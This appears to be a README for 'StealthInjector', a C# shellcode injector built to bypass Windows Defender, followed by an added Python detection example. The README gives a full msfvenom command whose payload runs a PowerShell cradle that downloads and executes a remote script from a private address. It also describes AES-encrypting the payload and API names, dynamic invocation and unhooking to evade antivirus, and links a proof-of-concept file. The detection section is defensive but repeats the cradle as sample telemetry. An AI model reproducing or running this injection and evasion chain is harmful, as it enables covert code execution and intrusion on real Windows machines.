# StealthInjector

StealthInjector.exe is a C# application that injects shellcode into a remote process and bypasses Windows Defender. It decrypts the payload directly in memory and dynamically invokes functions such as VirtualAllocEx and CreateRemoteThread through System.Reflection, obscuring their use in the code to evade static analysis.

### Features

* Remote interactive shell
* Dynamically Invoke functions like VirtualAllocEx and CreateRemoteThread
* Inject shellcode into remote process
* Basic Sandbox Evasion

### How the script works

1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows:

```shell
msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp
```

2. Payload Encryption: Next, we encrypt the generated payload with AES-256. This step is crucial: it obfuscates the payload, making it harder for antivirus programs such as Windows Defender to detect the malicious code.
3. Function Name Encryption: We apply the same encryption to the VirtualAllocEx and CreateRemoteThread function names to obscure their use in the code.
4. Dynamic Invocation and Decryption: Finally, using System.Reflection, we dynamically invoke these functions and decrypt the encrypted payload directly in memory.

### Note

Advanced antivirus programs may hook functions such as VirtualAllocEx and CreateRemoteThread. To execute our malicious payload, we first need to unhook them and then load our payload into memory.
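The injection chain above leaves two traces that userland unhooking does not remove: the PowerShell download cradle in the payload's command line, and the remote thread itself, which Sysmon's driver records as Event ID 8 (CreateRemoteThread) from kernel callbacks rather than from the hooked APIs. The following is an added detection example, not part of StealthInjector; the Sysmon-style event records, the path allowlist and the `10.X.X.X` address are constructed for illustration.

```python
import re

# Sysmon Event 1 (ProcessCreate): the msfvenom windows/exec payload spawns a
# PowerShell download cradle, IEX(IWR http://...), which is rarely legitimate.
CRADLE = re.compile(r"\bIEX\b.*\b(IWR|Invoke-WebRequest)\b.*https?://", re.IGNORECASE)

# Sysmon Event 8 (CreateRemoteThread): the injector is the SourceImage. A crude
# path allowlist is assumed here; tune it to your environment's baseline.
TRUSTED_SOURCES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def check_process_create(ev):
    """Return a finding string if the command line is a download cradle, else None."""
    cmd = ev.get("CommandLine", "")
    if CRADLE.search(cmd):
        return f"download cradle in {ev['Image']} (pid {ev['ProcessId']}): {cmd}"
    return None

def check_remote_thread(ev):
    """Return a finding string if the remote thread comes from an untrusted image."""
    if not ev["SourceImage"].lower().startswith(TRUSTED_SOURCES):
        return (f"remote thread from {ev['SourceImage']} into {ev['TargetImage']} "
                f"at {ev['StartAddress']}")
    return None

CHECKS = {1: check_process_create, 8: check_remote_thread}

def detect(events):
    """Run the per-event-ID checks; return a list of (EventID, finding) tuples."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["EventID"])
        hit = check(ev) if check else None
        if hit:
            findings.append((ev["EventID"], hit))
    return findings

# Constructed sample telemetry (not real logs) mirroring the page's chain: the
# injector creates a thread in notepad, then the payload runs the cradle.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": "C:\\Users\\lab\\Desktop\\StealthInjector.exe",
     "TargetImage": "C:\\Windows\\System32\\notepad.exe", "StartAddress": "0x1E2A3B40000"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ProcessId": 4120,
     "CommandLine": "cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ProcessId": 4130,
     "CommandLine": "notepad.exe"},
    {"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\svchost.exe", "StartAddress": "0x7FF8A1B20000"},
]
```

Calling `detect(SAMPLE_EVENTS)` returns the two findings from the injector's thread and the cradle; the path allowlist is deliberately simple, since a binary copied into System32 would pass it, so pair it with code-signing or hash checks in production.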

### POC

[POC file](/files/7fyAUcZZKN9odqPwcvDg)
